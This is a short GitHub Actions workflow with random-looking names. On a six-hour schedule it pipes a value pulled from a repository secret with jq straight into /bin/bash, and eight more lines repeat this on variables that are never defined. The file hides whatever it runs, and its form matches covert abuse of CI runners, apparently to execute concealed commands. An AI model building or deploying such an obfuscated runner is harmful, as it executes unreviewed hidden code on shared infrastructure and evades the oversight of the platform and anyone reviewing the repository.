name: zhangduanxiu4353
on:
  workflow_dispatch:
  schedule:
    - cron: '1 3/6 * * *'
jobs:  # 21212
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhangduanxiu4353
        env:
          yqmy7: ${{ secrets.yqmy7 }}
        run: |
          echo $yqmy7 | jq -r .o12 | /bin/bash
          echo $omd34 | jq -r .i074 | /bin/bash
          echo $xkfk9522 | jq -r .uu4 | /bin/bash
          echo $ojttf1322 | jq -r .st2 | /bin/bash
          echo $tzqr78964 | jq -r .ykgav3603 | /bin/bash
          echo $ty36449 | jq -r .ds06 | /bin/bash
          echo $hux490 | jq -r .gmuv9 | /bin/bash
          echo $bgwm3 | jq -r .cco7921 | /bin/bash
          echo $zflb1519 | jq -r .hcprr62107 | /bin/bash

